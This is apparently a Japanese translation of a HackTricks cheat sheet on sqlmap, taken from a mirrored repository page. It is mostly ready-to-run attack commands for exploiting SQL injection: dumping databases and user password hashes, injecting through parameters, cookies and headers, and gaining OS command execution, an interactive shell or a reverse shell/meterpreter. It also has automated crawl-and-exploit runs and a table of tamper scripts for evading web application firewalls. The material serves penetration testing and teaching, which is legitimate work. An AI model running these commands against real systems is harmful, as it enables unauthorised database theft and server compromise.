Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/sql-injection/sqlmap.md

10 KiB
Raw Blame History

ゼロからヒーローまでのAWSハッキングを学ぶ htARTEHackTricks AWS Red Team Expert

HackTricksをサポートする他の方法

SQLmapの基本的な引数

一般的

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY

情報の取得

内部

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB

DBデータ

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

インジェクション箇所

Burp/ZAPからのキャプチャ

リクエストをキャプチャしてreq.txtファイルを作成します

sqlmap -r req.txt --current-user

GETリクエストインジェクション

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POSTリクエストインジェクション

sqlmap -u "http://example.com" --data "username=*&password=*"

ヘッダーおよびその他のHTTPメソッドでのインジェクション

#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

2次注入

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

シェル

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

SQLmapを使用してウェブサイトをクロールし、自動的にエクスプロイトを実行します

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

インジェクションのカスタマイズ

サフィックスの設定

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

プレフィックス

python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

ブールインジェクションを見つけるのに役立つ方法

# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

改ざん

--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
Tamper 説明
apostrophemask.py アポストロフィ文字をそのUTF-8全角の対応文字に置き換えます
apostrophenullencode.py アポストロフィ文字をその不正なダブルユニコードの対応文字に置き換えます
appendnullbyte.py ペイロードの末尾にエンコードされたNULLバイト文字を追加します
base64encode.py 指定されたペイロード内のすべての文字をBase64にエンコードします
between.py 大なり演算子('>')を'NOT BETWEEN 0 AND #'に置き換えます
bluecoat.py SQLステートメントの後のスペース文字を有効なランダムな空白文字に置き換えます。その後、文字'='をLIKE演算子に置き換えます
chardoubleencode.py 指定されたペイロード内のすべての文字を2回URLエンコードしますすでにエンコードされているものは処理しません
commalesslimit.py 'LIMIT M, N'のようなインスタンスを'LIMIT N OFFSET M'に置き換えます
commalessmid.py 'MID(A, B, C)'のようなインスタンスを'MID(A FROM B FOR C)'に置き換えます
concat2concatws.py 'CONCAT(A, B)'のようなインスタンスを'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'に置き換えます
charencode.py 指定されたペイロード内のすべての文字をURLエンコードしますすでにエンコードされているものは処理しません
charunicodeencode.py 指定されたペイロード内の未エンコードの文字をUnicode-URLエンコードしますすでにエンコードされているものは処理しません。"%u0022"
charunicodeescape.py 指定されたペイロード内の未エンコードの文字をUnicode-URLエンコードしますすでにエンコードされているものは処理しません。"\u0022"
equaltolike.py すべての等しい演算子('=')を'LIKE'演算子に置き換えます
escapequotes.py クォート文字('および")をスラッシュでエスケープします
greatest.py 大なり演算子('>')を'GREATEST'に置き換えます
halfversionedmorekeywords.py 各キーワードの前にバージョン指定のMySQLコメントを追加します
ifnull2ifisnull.py 'IFNULL(A, B)'のようなインスタンスを'IF(ISNULL(A), B, A)'に置き換えます
modsecurityversioned.py バージョン指定コメントでクエリ全体を囲みます
modsecurityzeroversioned.py ゼロバージョンのコメントでクエリ全体を囲みます
multiplespaces.py SQLキーワードの周りに複数のスペースを追加します
nonrecursivereplacement.py 事前定義されたSQLキーワードを置換に適した表現に置き換えますたとえば.replace("SELECT", "")フィルター)
percentage.py 各文字の前にパーセンテージ記号('%')を追加します
overlongutf8.py 指定されたペイロード内のすべての文字を変換します(すでにエンコードされているものは処理しません)
randomcase.py 各キーワード文字をランダムなケース値に置き換えます
randomcomments.py SQLキーワードにランダムなコメントを追加します
securesphere.py 特別に作成された文字列を追加します
sp_password.py ペイロードの末尾に'sp_password'を追加して、DBMSログからの自動難読化を行います
space2comment.py スペース文字(' ')をコメントに置き換えます
space2dash.py スペース文字(' ')をダッシュコメント('--')に置き換え、その後にランダムな文字列と改行('\n')を追加します
space2hash.py スペース文字(' ')をポンド文字('#')に置き換え、その後にランダムな文字列と改行('\n')を追加します
space2morehash.py スペース文字(' ')をポンド文字('#')に置き換え、その後にランダムな文字列と改行('\n')を追加します
space2mssqlblank.py スペース文字(' ')を有効な代替文字セットからのランダムな空白文字に置き換えます
space2mssqlhash.py スペース文字(' ')をポンド文字('#')に置き換え、その後に改行('\n')を追加します
space2mysqlblank.py スペース文字(' ')を有効な代替文字セットからのランダムな空白文字に置き換えます
space2mysqldash.py スペース文字(' ')をダッシュコメント('--')に置き換え、その後に改行('\n')を追加します
space2plus.py スペース文字(' ')をプラス('+')に置き換えます
space2randomblank.py スペース文字(' ')を有効な代替文字セットからのランダムな空白文字に置き換えます
symboliclogical.py ANDおよびOR論理演算子をそれぞれのシンボルに置き換えます&&および
unionalltounion.py 'UNION ALL SELECT'を'UNION SELECT'に置き換えます
unmagicquotes.py クォート文字(')をマルチバイトコンボ%bf%27と一緒に一般的なコメントで置き換えます機能させるために
uppercase.py 各キーワード文字を大文字の値'INSERT'に置き換えます
varnish.py HTTPヘッダー'X-originating-IP'を追加します
versionedkeywords.py 関数でない各キーワードをバージョン指定のMySQLコメントで囲みます
versionedmorekeywords.py 各キーワードをバージョン指定のMySQLコメントで囲みます
xforwardedfor.py 偽のHTTPヘッダー'X-Forwarded-For'を追加します